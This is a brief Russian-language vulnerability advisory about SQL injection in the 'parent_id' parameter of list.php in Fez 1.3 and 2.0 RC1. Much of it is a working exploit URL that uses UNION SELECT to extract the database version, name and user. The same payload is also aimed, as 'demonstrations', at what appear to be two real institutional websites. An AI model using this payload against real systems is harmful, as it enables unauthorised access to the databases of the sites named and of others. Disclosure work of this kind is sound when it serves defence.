Программа: Fez 1.3/2.0 RC1
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «parent_id» сценарием list.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
http://site.com/list.php?browse=subject&parent_id=1 UNION SELECT
1,concat_ws(0x3a,version(),database(),user())/*
Демонстрация: 1.3
http://repository.openpolytechnic.ac.nz/list.php?browse=subject&parent_id=1
UNION SELECT 1,concat_ws(0x3a,version(),database(),user())/*
Демонстрация: 2.0 RC1
http://avi.lib.cas.cz/sandbox/fex/trunk/list.php?browse=subject&parent_id=1
UNION SELECT 1,concat_ws(0x3a,version(),database(),user())/*